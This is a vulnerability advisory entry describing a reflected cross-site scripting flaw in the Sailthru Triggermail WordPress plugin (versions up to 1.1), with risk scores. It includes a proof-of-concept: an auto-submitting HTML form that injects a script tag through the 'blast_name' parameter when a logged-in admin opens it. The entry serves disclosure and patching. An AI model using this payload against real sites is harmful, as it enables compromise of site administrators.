Lucene search

K
wpexploitBob MatyasWPEX-ID:072785DE-0CE5-42A4-A3FD-4EB1D1A2F1BE
HistoryApr 30, 2024 - 12:00 a.m.

Sailthru Triggermail <= 1.1 - Reflected XSS

2024-04-3000:00:00
Bob Matyas
35
sailthru
triggermail
reflected
xss
exploit
update
may 14 2024

AI Score

8.5

Confidence

High

EPSS

0

Percentile

9.0%

Description The plugin does not sanitise and escape various parameters before outputting them back in pages and attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Make a logged in admin open:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=sailthru&action=blast" method="post">
        <input type="hidden" name="blast_name" value='"><script>alert(23)</script>' />
        <input type="submit" value="Submit" />
    </form>
</body>
```

AI Score

8.5

Confidence

High

EPSS

0

Percentile

9.0%

Related for WPEX-ID:072785DE-0CE5-42A4-A3FD-4EB1D1A2F1BE